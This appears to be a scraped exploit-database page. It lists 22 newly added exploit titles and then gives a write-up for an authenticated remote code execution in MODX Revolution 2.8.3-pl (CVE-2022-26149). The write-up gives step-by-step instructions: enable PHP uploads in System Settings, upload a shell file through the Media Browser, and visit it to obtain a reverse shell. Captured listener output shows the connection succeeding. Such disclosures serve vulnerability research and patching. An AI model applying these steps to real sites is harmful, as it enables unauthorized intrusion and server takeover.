
22 changes to exploits/shellcodes/ghdb Password Manager for IIS v2.0 - XSS DLink DIR 819 A1 - Denial of Service D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution Abantecart v1.3.2 - Authenticated Remote Code Execution Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution Employee Performance Evaluation System v1.0 - File Inclusion and RCE GuppY CMS v6.00.10 - Remote Code Execution Human Resources Management System v1.0 - Multiple SQLi ImpressCMS v1.4.3 - Authenticated SQL Injection Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated) PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Yoga Class Registration System v1.0 - Multiple SQLi NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle _camp_ Raspberry Pi camera server 1.0 - Authentication Bypass System Mechanic v15.5.0.61 - Arbitrary Read/Write
20 lines
No EOL
1,003 B
Text
20 lines
No EOL
1,003 B
Text
# Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution
|
|
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
|
|
# Date: 26th Feb'2022
|
|
# CVE ID: CVE-2022-26149
|
|
# Confirmed on release 2.8.3-pl
|
|
# Reference: https://github.com/sartlabs/0days/blob/main/Modx/Exploit.txt
|
|
# Vendor: https://modx.com/download
|
|
|
|
###############################################
|
|
#Step1- Login with Admin Credentials
|
|
#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:
|
|
Add the php file extension under the "Uploadable File Types" option available in "System Settings"
|
|
#Step3- Now Goto Media=>Media Browser and upload the Shell.php
|
|
#Step4- Now visit http://IP_Address/Shell.php and get the reverse shell:
|
|
|
|
listening on [any] 4477 ...
|
|
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056
|
|
bash: cannot set terminal process group (1445): Inappropriate ioctl for device
|
|
bash: no job control in this shell
|
|
daemon@debian:/opt/bitnami/modx$ |